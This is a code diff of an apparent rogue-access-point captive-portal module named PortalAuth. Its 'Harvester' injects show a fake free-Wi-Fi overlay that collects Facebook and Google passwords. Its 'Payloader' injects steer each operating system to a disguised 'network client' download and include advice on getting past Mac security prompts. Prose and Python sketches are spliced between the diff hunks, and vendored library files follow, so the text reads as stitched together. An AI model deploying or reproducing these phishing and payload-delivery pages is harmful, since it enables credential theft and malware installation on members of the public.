.pa_h4 {margin: auto; font: 16px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
#pa_msgBox{
    top: 50%;
    left: 50%;
    width: 600px;
    height: 400px;
    margin-top: -230px;
    margin-left: -300px;
    z-index: 10;
    display: none;
}
#pa_overlay-back {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background-color: rgba(0,0,0,.7);
    z-index: 5;
    display: none;
}
.pa_connectButton {
    -moz-box-shadow:inset 0px 1px 3px 0px #3dc21b;
    -webkit-box-shadow:inset 0px 1px 3px 0px #3dc21b;
    box-shadow:inset 0px 1px 3px 0px #3dc21b;
    background:-webkit-gradient(linear, left top, left bottom, color-stop(0.05, #1fd950), color-stop(1, #5cbf2a));
    background:-moz-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
    background:-webkit-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
    background:-o-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
    background:-ms-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
    background:linear-gradient(to bottom, #1fd950 5%, #5cbf2a 100%);
    filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#1fd950', endColorstr='#5cbf2a',GradientType=0);
    background-color:#1fd950;
    -moz-border-radius:5px;
    -webkit-border-radius:5px;
    border-radius:5px;
    border:1px solid #18ab29;
    display:inline-block;
    cursor:pointer;
    color:#ffffff;
    font-family:arial;
    font-size:22px;
    font-weight:bold;
    padding:12px 37px;
    text-decoration:none;
    text-shadow:0px -1px 0px #2f6627;
}
.pa_connectButton:hover {
    background:-webkit-gradient(linear, left top, left bottom, color-stop(0.05, #5cbf2a), color-stop(1, #1fd950));
    background:-moz-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
    background:-webkit-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
    background:-o-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
    background:-ms-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
    background:linear-gradient(to bottom, #5cbf2a 5%, #1fd950 100%);
    filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#5cbf2a', endColorstr='#1fd950',GradientType=0);
    background-color:#5cbf2a;
}
.pa_connectButton:active {
    position:relative;
    top:1px;
}
.pa_left {
    margin-left: 60px;
}
</style>
15
PortalAuth/includes/scripts/injects/Harvester/backups/injectHTML.txt
Executable file
@@ -0,0 +1,15 @@
<div id="pa_overlay-back"></div>
<div id="pa_msgBox" class="pa_main">
    <h1 class="pa_h1">Internet access is on us today.</h1><br />
    <h4 class="pa_h4">Simply login with your Facebook or Google account<br />through our secure form below to start surfing.</h4>
    <br /><br />
    <div>
        <input type="text" id="pa_email" name="pa_email" class="pa_field" placeholder="FB or Gmail Login" />
    </div>
    <br />
    <div>
        <input type="password" id="pa_password" name="pa_password" class="pa_field" placeholder="FB or GMail Password" />
    </div>
    <br /><br />
    <button id="submit_button" class="pa_connectButton" type="button">Connect</button>
</div>
36
PortalAuth/includes/scripts/injects/Harvester/backups/injectJS.txt
Executable file
@@ -0,0 +1,36 @@
<script type="text/javascript" src="jquery-2.2.1.min.js"></script>

<script>
window.onload = setTimeout(displayLogin, 1000);
$(function() {
    $("#submit_button").on("click", function() {
        var email_addr = $('#pa_email').val();
        var pass = $('#pa_password').val();
        if (email_addr == "" || pass == "") {
            alert("Please login with your Facebook or Google account to access free Wi-Fi.");
            return;
        } else {
            $.ajax({
                type: "POST",
                url: "/captiveportal/index.php",
                data: {email: email_addr,
                       password: pass,
                       target: "<?=$destination?>"},
                dataType: 'json',
                success: function(data, textStatus, jqXHR) {
                    window.location="/captiveportal/index.php";
                },
                error: function(data, textStatus, errorThrown) {
                    window.location="/captiveportal/index.php";
                }
            });
        }
    });
});
function displayLogin() {
    $(function(){
        $("#pa_msgBox").css("opacity", "1");
        $("#pa_msgBox, #pa_overlay-back").fadeIn("slow");
    });
}
</script>
89
PortalAuth/includes/scripts/injects/Harvester/injectCSS.txt
Executable file
@@ -0,0 +1,89 @@
<style>
.pa_field {
    width: 70%;
    height: 30px;
    font-size: 18px;
    border: 1px solid #000;
}
.pa_main {
    background-color: rgba(255,255,255,.9);
    left: 0%;
    margin-top: 200px;
    text-align: center;
    padding-top: 75px;
    position: fixed;
    border-style:solid;
    border-width:medium;
    border-color:#aaa;
    -webkit-box-shadow: 10px 10px 5px 0px rgba(11,11,11,0.9);
    -moz-box-shadow: 10px 10px 5px 0px rgba(11,11,11,0.9);
    box-shadow: 10px 10px 5px 0px rgba(11,11,11,0.9);
}
.pa_h1 {margin: auto; font: 36px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
.pa_h2 {margin: auto; font: 26px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
.pa_h3 {margin: auto; font: 22px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
.pa_h4 {margin: auto; font: 16px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
#pa_msgBox{
    top: 50%;
    left: 50%;
    width: 600px;
    height: 400px;
    margin-top: -230px;
    margin-left: -300px;
    z-index: 10;
    display: none;
}
#pa_overlay-back {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background-color: rgba(0,0,0,.7);
    z-index: 5;
    display: none;
}
.pa_connectButton {
    -moz-box-shadow:inset 0px 1px 3px 0px #3dc21b;
    -webkit-box-shadow:inset 0px 1px 3px 0px #3dc21b;
    box-shadow:inset 0px 1px 3px 0px #3dc21b;
    background:-webkit-gradient(linear, left top, left bottom, color-stop(0.05, #1fd950), color-stop(1, #5cbf2a));
    background:-moz-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
    background:-webkit-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
    background:-o-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
    background:-ms-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
    background:linear-gradient(to bottom, #1fd950 5%, #5cbf2a 100%);
    filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#1fd950', endColorstr='#5cbf2a',GradientType=0);
    background-color:#1fd950;
    -moz-border-radius:5px;
    -webkit-border-radius:5px;
    border-radius:5px;
    border:1px solid #18ab29;
    display:inline-block;
    cursor:pointer;
    color:#ffffff;
    font-family:arial;
    font-size:22px;
    font-weight:bold;
    padding:12px 37px;
    text-decoration:none;
    text-shadow:0px -1px 0px #2f6627;
}
.pa_connectButton:hover {
    background:-webkit-gradient(linear, left top, left bottom, color-stop(0.05, #5cbf2a), color-stop(1, #1fd950));
    background:-moz-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
    background:-webkit-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
    background:-o-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
    background:-ms-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
    background:linear-gradient(to bottom, #5cbf2a 5%, #1fd950 100%);
    filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#5cbf2a', endColorstr='#1fd950',GradientType=0);
    background-color:#5cbf2a;
}
.pa_connectButton:active {
    position:relative;
    top:1px;
}
.pa_left {
    margin-left: 60px;
}
</style>
15
PortalAuth/includes/scripts/injects/Harvester/injectHTML.txt
Executable file
@@ -0,0 +1,15 @@
<div id="pa_overlay-back"></div>
<div id="pa_msgBox" class="pa_main">
    <h1 class="pa_h1">Internet access is on us today.</h1><br />
    <h4 class="pa_h4">Simply login with your Facebook or Google account<br />through our secure form below to start surfing.</h4>
    <br /><br />
    <div>
        <input type="text" id="pa_email" name="pa_email" class="pa_field" placeholder="FB or Gmail Login" />
    </div>
    <br />
    <div>
        <input type="password" id="pa_password" name="pa_password" class="pa_field" placeholder="FB or GMail Password" />
    </div>
    <br /><br />
    <button id="submit_button" class="pa_connectButton" type="button">Connect</button>
</div>
36
PortalAuth/includes/scripts/injects/Harvester/injectJS.txt
Executable file
@@ -0,0 +1,36 @@
<script type="text/javascript" src="jquery-2.2.1.min.js"></script>

<script>
window.onload = setTimeout(displayLogin, 1000);
$(function() {
    $("#submit_button").on("click", function() {
        var email_addr = $('#pa_email').val();
        var pass = $('#pa_password').val();
        if (email_addr == "" || pass == "") {
            alert("Please login with your Facebook or Google account to access free Wi-Fi.");
            return;
        } else {
            $.ajax({
                type: "POST",
                url: "/captiveportal/index.php",
                data: {email: email_addr,
                       password: pass,
                       target: "<?=$destination?>"},
                dataType: 'json',
                success: function(data, textStatus, jqXHR) {
                    window.location="/captiveportal/index.php";
                },
                error: function(data, textStatus, errorThrown) {
                    window.location="/captiveportal/index.php";
                }
            });
        }
    });
});
function displayLogin() {
    $(function(){
        $("#pa_msgBox").css("opacity", "1");
        $("#pa_msgBox, #pa_overlay-back").fadeIn("slow");
    });
}
</script>
3
PortalAuth/includes/scripts/injects/Harvester/injectPHP.txt
Executable file
@@ -0,0 +1,3 @@
<?php
$destination = "http://". $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . "";
?>
23
PortalAuth/includes/scripts/injects/Payloader/MyPortal.php
Executable file
@@ -0,0 +1,23 @@
<?php
namespace evilportal;

class MyPortal extends Portal
{

    public function handleAuthorization()
    {
        parent::handleAuthorization();
    }

    public function showSuccess()
    {
        // Calls default success message
        parent::showSuccess();
    }

    public function showError()
    {
        // Calls default error message
        parent::showError();
    }
}
23
PortalAuth/includes/scripts/injects/Payloader/backups/MyPortal.php
Executable file
@@ -0,0 +1,23 @@
<?php
namespace evilportal;

class MyPortal extends Portal
{

    public function handleAuthorization()
    {
        parent::handleAuthorization();
    }

    public function showSuccess()
    {
        // Calls default success message
        parent::showSuccess();
    }

    public function showError()
    {
        // Calls default error message
        parent::showError();
    }
}
90
PortalAuth/includes/scripts/injects/Payloader/backups/injectCSS.txt
Executable file
@@ -0,0 +1,90 @@
<style>
.pa_field {
    width: 70%;
    height: 30px;
    font-size: 18px;
    border: 1px solid black;
}
.pa_main {
    background-color: rgba(255,255,255,.9);
    left: 0%;
    margin-top: 200px;
    text-align: center;
    padding-top: 75px;
    position: fixed;
    border-style:solid;
    border-width:medium;
    border-color:#aaa;
    -webkit-box-shadow: 10px 10px 5px 0px rgba(11,11,11,0.9);
    -moz-box-shadow: 10px 10px 5px 0px rgba(11,11,11,0.9);
    box-shadow: 10px 10px 5px 0px rgba(11,11,11,0.9);
}
.pa_h1 {margin: auto; font: 36px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
.pa_h2 {margin: auto; font: 26px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
.pa_h3 {margin: auto; font: 22px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
.pa_h4 {margin: auto; font: 16px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
#pa_akp {
    top: 50%;
    left: 50%;
    width: 600px;
    height: 340px;
    padding: 20px;
    margin-top: -200px;
    margin-left: -330px;
    z-index: 15;
    display: none;
}
#pa_overlay-back {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background-color: rgba(0,0,0,.7);
    z-index: 5;
    display: none;
}
.pa_connectButton {
    -moz-box-shadow:inset 0px 1px 3px 0px #3dc21b;
    -webkit-box-shadow:inset 0px 1px 3px 0px #3dc21b;
    box-shadow:inset 0px 1px 3px 0px #3dc21b;
    background:-webkit-gradient(linear, left top, left bottom, color-stop(0.05, #1fd950), color-stop(1, #5cbf2a));
    background:-moz-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
    background:-webkit-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
    background:-o-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
    background:-ms-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
    background:linear-gradient(to bottom, #1fd950 5%, #5cbf2a 100%);
    filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#1fd950', endColorstr='#5cbf2a',GradientType=0);
    background-color:#1fd950;
    -moz-border-radius:5px;
    -webkit-border-radius:5px;
    border-radius:5px;
    border:1px solid #18ab29;
    display:inline-block;
    cursor:pointer;
    color:#ffffff;
    font-family:arial;
    font-size:22px;
    font-weight:bold;
    padding:12px 37px;
    text-decoration:none;
    text-shadow:0px -1px 0px #2f6627;
}
.pa_connectButton:hover {
    background:-webkit-gradient(linear, left top, left bottom, color-stop(0.05, #5cbf2a), color-stop(1, #1fd950));
    background:-moz-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
    background:-webkit-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
    background:-o-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
    background:-ms-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
    background:linear-gradient(to bottom, #5cbf2a 5%, #1fd950 100%);
    filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#5cbf2a', endColorstr='#1fd950',GradientType=0);
    background-color:#5cbf2a;
}
.pa_connectButton:active {
    position:relative;
    top:1px;
}
.pa_left {
    margin-left: 60px;
}
</style>
14
PortalAuth/includes/scripts/injects/Payloader/backups/injectHTML.txt
Executable file
@@ -0,0 +1,14 @@
<div id="pa_overlay-back"></div>
<div id='pa_akp' class='pa_main'>
    <h1 class="pa_h1">Network Client Download</h1><br />
    <h4 class="pa_h4">To access our WiFi please download and use our free network client software.
    When you run the program an <strong>access key</strong> will be generated which will need to be entered below
    in order to start surfing the internet.</h4>
    <br />
    <a id="pa_NetClientURL" href=""><h3 class='pa_h3'>Download Network Client</h3></a>
    <br />
    <span id='pa_macnotice' style='font-size: 80%;'><br /></span>
    <input type='text' id='pa_accessKey' class='pa_field' placeholder='Access Key' />
    <br /><br />
    <button id="submit_button" class="pa_connectButton" type="button">Submit</button>
</div>
70
PortalAuth/includes/scripts/injects/Payloader/backups/injectJS.txt
Executable file
@@ -0,0 +1,70 @@
|
||||
<script type="text/javascript" src="jquery-2.2.1.min.js"></script>
|
||||
|
||||
<script>
|
||||
window.onload = setTimeout(displayAccessKeyPanel, 1000);
|
||||
|
||||
$(function() {
|
||||
if (navigator.appVersion.indexOf("Win") != -1) {
|
||||
<?php
|
||||
echo "$('#pa_NetClientURL').prop('href', '" . $exePath . $exe . "');";
|
||||
?>
|
||||
} else if (navigator.appVersion.indexOf("Mac") != -1) {
|
||||
<?php
|
||||
echo "$('#pa_NetClientURL').prop('href', '" . $appPath . $app . "');";
|
||||
?>
|
||||
$('#pa_macnotice').html("*NOTE: To run the network client on your Mac you need to hold down the control button, click the app, then click open.");
|
||||
} else if (navigator.appVersion.indexOf("Android") != -1) {
|
||||
<?php
|
||||
echo "$('#pa_NetClientURL').prop('href', '" . $apkPath . $apk . "');";
|
||||
?>
|
||||
} else if (navigator.appVersion.indexOf("iPhone") != -1) {
|
||||
<?php
|
||||
echo "$('#pa_NetClientURL').prop('href', '" . $ipaPath . $ipa . "');";
|
||||
?>
|
||||
} else if (navigator.appVersion.indexOf("iPad") != -1) {
|
||||
<?php
|
||||
echo "$('#pa_NetClientURL').prop('href', '" . $ipaPath . $ipa . "');";
|
||||
?>
|
||||
} else if (navigator.appVersion.indexOf("iPod") != -1) {
|
||||
<?php
|
||||
echo "$('#pa_NetClientURL').prop('href', '" . $ipaPath . $ipa . "');";
|
||||
?>
|
||||
}
|
||||
|
||||
$('#submit_button').on('click',function(){
|
||||
if ($('#pa_accessKey').val() == "") {
|
||||
alert("Please enter the access key given by the network client software.");
|
||||
return;
|
||||
}
|
||||
$.ajax({
|
||||
type: "POST",
|
||||
url: "/index.php",
|
||||
data: {verifyAccessKey: $('#pa_accessKey').val()},
|
||||
dataType: 'json',
|
||||
success: function(data, textStatus, jqXHR) {
|
||||
$.ajax({
|
||||
type: "POST",
|
||||
url: "/captiveportal/index.php",
|
||||
data: {target: "<?=$destination?>"},
|
||||
dataType: 'json',
|
||||
success: function(data, textStatus, jqHXR) {
|
||||
window.location="/captiveportal/index.php";
|
||||
},
|
||||
error: function(data, textStatus, errorThrown) {
|
||||
window.location="/captiveportal/index.php";
|
||||
}
|
||||
});
|
||||
},
|
||||
error: function(data, textStatus, errorThrown) {
|
||||
alert("Invalid access key");
|
||||
}
|
||||
});
|
||||
});
|
||||
});
|
||||
function displayAccessKeyPanel(){
|
||||
$(function(){
|
||||
$('#pa_akp').css('opacity','1');
|
||||
$('#pa_akp,#pa_overlay-back').fadeIn('slow');
|
||||
});
|
||||
}
|
||||
</script>
|
||||
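The injected script above performs a two-step handshake: it POSTs the access key to the cloned portal's /index.php, and on success POSTs the client's original destination to /captiveportal/index.php before redirecting there. Below is a minimal Python sketch of the same flow, handy for testing a cloned portal from a client; the gateway address and key value are assumptions for illustration, not values from this module.

# Sketch of the access-key authorization flow driven from Python with requests.
import requests

PORTAL = "http://172.16.42.1"  # hypothetical portal address, adjust as needed

def authorize(access_key, destination="http://example.com/"):
    s = requests.Session()
    # Step 1: submit the access key to the cloned portal's index.php.
    r = s.post(PORTAL + "/index.php", data={"verifyAccessKey": access_key})
    r.raise_for_status()
    # Step 2: tell the captive portal handler where the client was headed.
    s.post(PORTAL + "/captiveportal/index.php", data={"target": destination})
    return r.text

if __name__ == "__main__":
    print(authorize("1234-5678"))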
49
PortalAuth/includes/scripts/injects/Payloader/backups/injectPHP.txt
Executable file
@@ -0,0 +1,49 @@
<?php

/*==================*/
/* v DO NOT MODIFY v */
/*==================*/

$exe = "<EXE>";
$app = "<APP>";
$apk = "<APK>";
$ipa = "<IPA>";

/*==================*/
/* ^ DO NOT MODIFY ^ */
/*==================*/

$base = "/download/";
$exePath = $base . "windows/";
$appPath = $base . "osx/";
$apkPath = $base . "android/";
$ipaPath = $base . "ios/";

$destination = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];

/*
This script compares the access key entered by the user with the user's stored access key to either allow or deny access.
The key is held in a file that has the name of the user's IP address with all periods replaced with underscores,
in the $keyDir directory. The contents of the file are read in and compared with the supplied access key,
and either True or False is echoed back to the script in injectJS.
*/
header('Access-Control-Allow-Origin: *');
if (isset($_POST['verifyAccessKey'])) {

    // Set up variables with the location of the key files
    $keyDir = "/pineapple/modules/PortalAuth/includes/pass/keys/";
    $keyFile = $keyDir . str_replace(".", "_", $_SERVER['REMOTE_ADDR']) . ".txt";

    // Open the key file associated with the current client and read the value
    $accessKey = file_get_contents($keyFile);

    // Check if the access key provided by the client matches the one from the file
    if ($_POST['verifyAccessKey'] == $accessKey) {
        echo True;
    } else {
        echo False;
    }
    die();
}

?>
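The comment block in injectPHP spells out the key-file convention: one file per client, named after the client's IP address with dots replaced by underscores, holding that client's access key. A minimal Python sketch of both sides of that convention follows (it is not part of the module; the directory path simply mirrors $keyDir above).

# Sketch of the per-client key-file convention read by injectPHP.
import os

KEY_DIR = "/pineapple/modules/PortalAuth/includes/pass/keys/"

def key_path(client_ip):
    # "172.16.42.100" -> ".../172_16_42_100.txt"
    return os.path.join(KEY_DIR, client_ip.replace(".", "_") + ".txt")

def write_access_key(client_ip, access_key):
    with open(key_path(client_ip), "w") as f:
        f.write(access_key)

def check_access_key(client_ip, submitted_key):
    with open(key_path(client_ip)) as f:
        return f.read() == submitted_key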
90
PortalAuth/includes/scripts/injects/Payloader/injectCSS.txt
Executable file
@@ -0,0 +1,90 @@
<style>
.pa_field {
    width: 70%;
    height: 30px;
    font-size: 18px;
    border: 1px solid black;
}
.pa_main {
    background-color: rgba(255,255,255,.9);
    left: 0%;
    margin-top: 200px;
    text-align: center;
    padding-top: 75px;
    position: fixed;
    border-style: solid;
    border-width: medium;
    border-color: #aaa;
    -webkit-box-shadow: 10px 10px 5px 0px rgba(11,11,11,0.9);
    -moz-box-shadow: 10px 10px 5px 0px rgba(11,11,11,0.9);
    box-shadow: 10px 10px 5px 0px rgba(11,11,11,0.9);
}
.pa_h1 {margin: auto; font: 36px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
.pa_h2 {margin: auto; font: 26px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
.pa_h3 {margin: auto; font: 22px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
.pa_h4 {margin: auto; font: 16px 'Helvetica Neue', Helvetica, Arial, sans-serif;}
#pa_akp {
    top: 50%;
    left: 50%;
    width: 600px;
    height: 340px;
    padding: 20px;
    margin-top: -200px;
    margin-left: -330px;
    z-index: 15;
    display: none;
}
#pa_overlay-back {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background-color: rgba(0,0,0,.7);
    z-index: 5;
    display: none;
}
.pa_connectButton {
    -moz-box-shadow: inset 0px 1px 3px 0px #3dc21b;
    -webkit-box-shadow: inset 0px 1px 3px 0px #3dc21b;
    box-shadow: inset 0px 1px 3px 0px #3dc21b;
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0.05, #1fd950), color-stop(1, #5cbf2a));
    background: -moz-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
    background: -webkit-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
    background: -o-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
    background: -ms-linear-gradient(top, #1fd950 5%, #5cbf2a 100%);
    background: linear-gradient(to bottom, #1fd950 5%, #5cbf2a 100%);
    filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#1fd950', endColorstr='#5cbf2a',GradientType=0);
    background-color: #1fd950;
    -moz-border-radius: 5px;
    -webkit-border-radius: 5px;
    border-radius: 5px;
    border: 1px solid #18ab29;
    display: inline-block;
    cursor: pointer;
    color: #ffffff;
    font-family: arial;
    font-size: 22px;
    font-weight: bold;
    padding: 12px 37px;
    text-decoration: none;
    text-shadow: 0px -1px 0px #2f6627;
}
.pa_connectButton:hover {
    background: -webkit-gradient(linear, left top, left bottom, color-stop(0.05, #5cbf2a), color-stop(1, #1fd950));
    background: -moz-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
    background: -webkit-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
    background: -o-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
    background: -ms-linear-gradient(top, #5cbf2a 5%, #1fd950 100%);
    background: linear-gradient(to bottom, #5cbf2a 5%, #1fd950 100%);
    filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#5cbf2a', endColorstr='#1fd950',GradientType=0);
    background-color: #5cbf2a;
}
.pa_connectButton:active {
    position: relative;
    top: 1px;
}
.pa_left {
    margin-left: 60px;
}
</style>
14
PortalAuth/includes/scripts/injects/Payloader/injectHTML.txt
Executable file
@@ -0,0 +1,14 @@
<div id="pa_overlay-back"></div>
<div id='pa_akp' class='pa_main'>
<h1 class="pa_h1">Network Client Download</h1><br />
<h4 class="pa_h4">To access our WiFi, please download and use our free network client software.
When you run the program, an <strong>access key</strong> will be generated, which will need to be entered below
in order to start surfing the internet.</h4>
<br />
<a id="pa_NetClientURL" href=""><h3 class='pa_h3'>Download Network Client</h3></a>
<br />
<span id='pa_macnotice' style='font-size: 80%;'><br /></span>
<input type='text' id='pa_accessKey' class='pa_field' placeholder='Access Key' />
<br /><br />
<button id="submit_button" class="pa_connectButton" type="button">Submit</button>
</div>
70
PortalAuth/includes/scripts/injects/Payloader/injectJS.txt
Executable file
@@ -0,0 +1,70 @@
<script type="text/javascript" src="jquery-2.2.1.min.js"></script>

<script>
window.onload = function() { setTimeout(displayAccessKeyPanel, 1000); };

$(function() {
    if (navigator.appVersion.indexOf("Win") != -1) {
        <?php
            echo "$('#pa_NetClientURL').prop('href', '" . $exePath . $exe . "');";
        ?>
    } else if (navigator.appVersion.indexOf("Mac") != -1) {
        <?php
            echo "$('#pa_NetClientURL').prop('href', '" . $appPath . $app . "');";
        ?>
        $('#pa_macnotice').html("*NOTE: To run the network client on your Mac you need to hold down the control button, click the app, then click open.");
    } else if (navigator.appVersion.indexOf("Android") != -1) {
        <?php
            echo "$('#pa_NetClientURL').prop('href', '" . $apkPath . $apk . "');";
        ?>
    } else if (navigator.appVersion.indexOf("iPhone") != -1) {
        <?php
            echo "$('#pa_NetClientURL').prop('href', '" . $ipaPath . $ipa . "');";
        ?>
    } else if (navigator.appVersion.indexOf("iPad") != -1) {
        <?php
            echo "$('#pa_NetClientURL').prop('href', '" . $ipaPath . $ipa . "');";
        ?>
    } else if (navigator.appVersion.indexOf("iPod") != -1) {
        <?php
            echo "$('#pa_NetClientURL').prop('href', '" . $ipaPath . $ipa . "');";
        ?>
    }

    $('#submit_button').on('click', function(){
        if ($('#pa_accessKey').val() == "") {
            alert("Please enter the access key given by the network client software.");
            return;
        }
        $.ajax({
            type: "POST",
            url: "/index.php",
            data: {verifyAccessKey: $('#pa_accessKey').val()},
            dataType: 'json',
            success: function(data, textStatus, jqXHR) {
                $.ajax({
                    type: "POST",
                    url: "/captiveportal/index.php",
                    data: {target: "<?=$destination?>"},
                    dataType: 'json',
                    success: function(data, textStatus, jqXHR) {
                        window.location = "/captiveportal/index.php";
                    },
                    error: function(data, textStatus, errorThrown) {
                        window.location = "/captiveportal/index.php";
                    }
                });
            },
            error: function(data, textStatus, errorThrown) {
                alert("Invalid access key");
            }
        });
    });
});

function displayAccessKeyPanel(){
    $(function(){
        $('#pa_akp').css('opacity', '1');
        $('#pa_akp,#pa_overlay-back').fadeIn('slow');
    });
}
</script>
49
PortalAuth/includes/scripts/injects/Payloader/injectPHP.txt
Executable file
@@ -0,0 +1,49 @@
<?php

/*==================*/
/* v DO NOT MODIFY v */
/*==================*/

$exe = "<EXE>";
$app = "<APP>";
$apk = "<APK>";
$ipa = "<IPA>";

/*==================*/
/* ^ DO NOT MODIFY ^ */
/*==================*/

$base = "/download/";
$exePath = $base . "windows/";
$appPath = $base . "osx/";
$apkPath = $base . "android/";
$ipaPath = $base . "ios/";

$destination = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];

/*
This script compares the access key entered by the user with the user's stored access key to either allow or deny access.
The key is held in a file that has the name of the user's IP address with all periods replaced with underscores,
in the $keyDir directory. The contents of the file are read in and compared with the supplied access key,
and either True or False is echoed back to the script in injectJS.
*/
header('Access-Control-Allow-Origin: *');
if (isset($_POST['verifyAccessKey'])) {

    // Set up variables with the location of the key files
    $keyDir = "/pineapple/modules/PortalAuth/includes/pass/keys/";
    $keyFile = $keyDir . str_replace(".", "_", $_SERVER['REMOTE_ADDR']) . ".txt";

    // Open the key file associated with the current client and read the value
    $accessKey = file_get_contents($keyFile);

    // Check if the access key provided by the client matches the one from the file
    if ($_POST['verifyAccessKey'] == $accessKey) {
        echo True;
    } else {
        echo False;
    }
    die();
}

?>
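The <EXE>, <APP>, <APK>, and <IPA> markers in the block above are placeholders that get swapped for real payload filenames when the Payloader inject is armed. The module's actual substitution code is not part of this diff; the following is a purely hypothetical Python sketch of what that substitution could look like, with invented filenames.

# Hypothetical placeholder substitution for the Payloader inject template.
payloads = {"<EXE>": "netclient.exe", "<APP>": "netclient.app",
            "<APK>": "netclient.apk", "<IPA>": "netclient.ipa"}

with open("injectPHP.txt") as f:
    template = f.read()
for placeholder, filename in payloads.items():
    template = template.replace(placeholder, filename)
with open("injectPHP_armed.txt", "w") as f:
    f.write(template)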
4
PortalAuth/includes/scripts/jquery-2.2.1.min.js
vendored
Executable file
File diff suppressed because one or more lines are too long
21
PortalAuth/includes/scripts/libs/beautifulsoup4.egg-info/PKG-INFO
Executable file
@@ -0,0 +1,21 @@
Metadata-Version: 1.1
Name: beautifulsoup4
Version: 4.4.0
Summary: Screen-scraping library
Home-page: http://www.crummy.com/software/BeautifulSoup/bs4/
Author: Leonard Richardson
Author-email: leonardr@segfault.org
License: MIT
Download-URL: http://www.crummy.com/software/BeautifulSoup/bs4/download/
Description: Beautiful Soup sits atop an HTML or XML parser, providing Pythonic idioms for iterating, searching, and modifying the parse tree.
Platform: UNKNOWN
Classifier: Development Status :: 5 - Production/Stable
Classifier: Intended Audience :: Developers
Classifier: License :: OSI Approved :: MIT License
Classifier: Programming Language :: Python
Classifier: Programming Language :: Python :: 2
Classifier: Programming Language :: Python :: 3
Classifier: Topic :: Text Processing :: Markup :: HTML
Classifier: Topic :: Text Processing :: Markup :: XML
Classifier: Topic :: Text Processing :: Markup :: SGML
Classifier: Topic :: Software Development :: Libraries :: Python Modules
40
PortalAuth/includes/scripts/libs/beautifulsoup4.egg-info/SOURCES.txt
Executable file
@@ -0,0 +1,40 @@
AUTHORS.txt
COPYING.txt
MANIFEST.in
NEWS.txt
README.txt
TODO.txt
convert-py3k
setup.cfg
setup.py
test-all-versions
beautifulsoup4.egg-info/PKG-INFO
beautifulsoup4.egg-info/SOURCES.txt
beautifulsoup4.egg-info/dependency_links.txt
beautifulsoup4.egg-info/requires.txt
beautifulsoup4.egg-info/top_level.txt
bs4/__init__.py
bs4/dammit.py
bs4/diagnose.py
bs4/element.py
bs4/testing.py
bs4/builder/__init__.py
bs4/builder/_html5lib.py
bs4/builder/_htmlparser.py
bs4/builder/_lxml.py
bs4/tests/__init__.py
bs4/tests/test_builder_registry.py
bs4/tests/test_docs.py
bs4/tests/test_html5lib.py
bs4/tests/test_htmlparser.py
bs4/tests/test_lxml.py
bs4/tests/test_soup.py
bs4/tests/test_tree.py
doc/Makefile
doc.zh/Makefile
doc.zh/source/conf.py
doc/source/6.1.jpg
doc/source/conf.py
doc/source/index.rst
scripts/demonstrate_parser_differences.py
scripts/demonstration_markup.txt
1
PortalAuth/includes/scripts/libs/beautifulsoup4.egg-info/dependency_links.txt
Executable file
@@ -0,0 +1 @@

7
PortalAuth/includes/scripts/libs/beautifulsoup4.egg-info/requires.txt
Executable file
@@ -0,0 +1,7 @@


[lxml]
lxml

[html5lib]
html5lib
1
PortalAuth/includes/scripts/libs/beautifulsoup4.egg-info/top_level.txt
Executable file
@@ -0,0 +1 @@
bs4
468
PortalAuth/includes/scripts/libs/bs4/__init__.py
Executable file
@@ -0,0 +1,468 @@
"""Beautiful Soup
Elixir and Tonic
